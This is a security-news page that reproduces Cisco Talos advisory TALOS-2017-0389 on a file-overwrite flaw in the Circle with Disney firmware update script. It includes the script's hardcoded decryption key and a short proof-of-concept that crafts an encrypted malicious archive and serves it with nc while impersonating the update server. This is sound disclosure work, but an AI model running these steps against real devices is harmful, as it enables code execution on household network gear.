Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2017-2882: TALOS-2017-0389 || Cisco Talos Intelligence Group

An exploitable vulnerability exists in the servers update functionality of Circle with Disney running firmware 2.0.1. Specially crafted network packets can cause the device to overwrite sensitive files, resulting in code execution. An attacker needs to impersonate a remote server in order to trigger this vulnerability.

CVE
#vulnerability#mac#cisco#intel#php#auth

Summary

An exploitable vulnerability exists in the servers update functionality of Circle with Disney running firmware 2.0.1. Specially crafted network packets can cause the device to overwrite sensitive files, resulting in code execution. An attacker needs to impersonate a remote server in order to trigger this vulnerability.

Tested Versions

Circle with Disney 2.0.1

Product URLs

https://meetcircle.com/

CVSSv3 Score

9.0 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-73: External Control of File Name or Path

Details

Circle with Disney is a network device used to monitor internet use of children on a given network.

A cronjob exists which executes the script “check_circleservers.sh” every 4 hours:

#!/bin/sh
MAC=`cat /tmp/MAC`;
VER=`cat /tmp/circleservers.ver`
CIRCLE_ROOT=`cat /tmp/CIRCLE_ROOT`
rm -f /tmp/circleservers.bin /tmp/circleserver.tgz
/tmp/wget -q -t 1 -T 30  -O /tmp/circleservers.bin "http://download.meetcircle.co/dev/firmware/get_circleservers.php?
DEVID=$MAC&VER=$VER" || exit
if [ -s /tmp/circleservers.bin ]; then
    /tmp/aescrypt -d -p a801e2f7bd4104073a296dc5c63857cf -o /tmp/circleservers.tgz /tmp/circleservers.bin || exit
    [ -s /tmp/circleservers.tgz ] || exit
    cd /tmp/
    tar zxf /tmp/circleservers.tgz
        if [ -s /tmp/circleservers ]; then
            $CIRCLE_ROOT/ipsetload circleservers /tmp/circleservers
                cp -f /tmp/circleservers $CIRCLE_ROOT/scripts/circleservers.list
        fi
fi
rm -f /tmp/circleservers.bin /tmp/circleservers.tgz

The script above downloads an encrypted tar archive using an HTTP request, which gets then decrypted and extracted in the “/tmp” directory. Since the encryption password is known and the http connection is not authenticated, an attacker able to impersonate the remote server could overwrite any file in the “/tmp” directory. Since the script itself executes “/tmp/aescrypt”, one of the ways to exploit this bug is to overwrite “aescrypt” with a custom executable: this allows an attacker to execute arbitrary code on the next call of the script.

Exploit Proof-of-Concept

The following proof of concept shows how to execute the “power_down.sh” script on the device. An attacker needs to impersonate the server “download.meetcircle.co” in order to answer to the HTTP requests.

$ echo "/mnt/shares/usr/bin/scripts/circle/power_down.sh" > aescrypt
$ chmod 777 aescrypt
$ tar czf evil.tgz aescrypt
$ aescrypt -e -p a801e2f7bd4104073a296dc5c63857cf -o evil.bin evil.tgz
$ ( echo -en "HTTP/1.0 200 OK\nContent-Length: $(stat -c%s evil.bin)\n\n"; cat evil.bin ) | sudo nc -vv -l -p 80
$ ( echo -en "HTTP/1.0 200 OK\nContent-Length: 1\n\nX" ) | sudo nc -vv -l -p 80

Timeline

2017-08-02 - Vendor Disclosure
2017-10-31 - Public Release

Discovered by Claudio Bozzato and Lilith Wyatt <(^_^)> of Cisco Talos.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907